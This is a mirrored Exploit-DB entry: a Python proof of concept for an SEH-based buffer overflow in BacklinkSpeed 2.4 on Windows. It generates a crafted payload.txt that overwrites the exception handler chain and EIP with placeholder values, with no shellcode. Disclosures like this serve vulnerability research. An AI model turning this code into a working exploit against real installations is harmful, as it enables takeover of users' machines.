BacklinkSpeed 2.4 – Buffer Overflow PoC (SEH)

• Exploit Database
• 30 阅读

• 作者： Saeed reza Zamanian
  日期： 2020-08-03
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/48726/

• # Exploit Title: BacklinkSpeed 2.4 - Buffer Overflow PoC (SEH)
  # Date: 2020-08-01
  # Exploit Author: Saeed reza Zamanian
  # Vendor Homepage: http://www.dummysoftware.com
  # Software Link: http://www.dummysoftware.com/backlinkspeed.html
  # Version: 2.4
  # Tested on: 
  	Windows 10.0 x64 Build 10240
  	Windows 7 x64
  	Windows Vista x32 SP1
  # Replicate Crash:
  1) Install and Run the application
  2) Run the exploit , the exploit create a text file named payload.txt
  3) Press import button and open payload.txt
  
  #!/usr/bin/python
  '''
  
  	|----------------------------------|
  	| SEH chain of thread 00000350	 |
  	| AddressSE handler		 |
  	| 42424242 *** CORRUPT ENTRY *** |
  	|				 |
  	| EIP : 43434343		 |
  	|----------------------------------|
  '''
  
  nSEH = "BBBB"
  SEH = "CCCC"
  payload = "A"*5000+nSEH+"\x90\x90\x90\x90\x90\x90\x90\x90"+SEH
  
  try:
  
  f=open("payload.txt","w")
  
  print("[+] Creating %s bytes payload." %len(payload))
  
  f.write(payload)
  
  f.close()
  
  print("[+] File created!")
  
  except:
  
  print("File cannot be created.")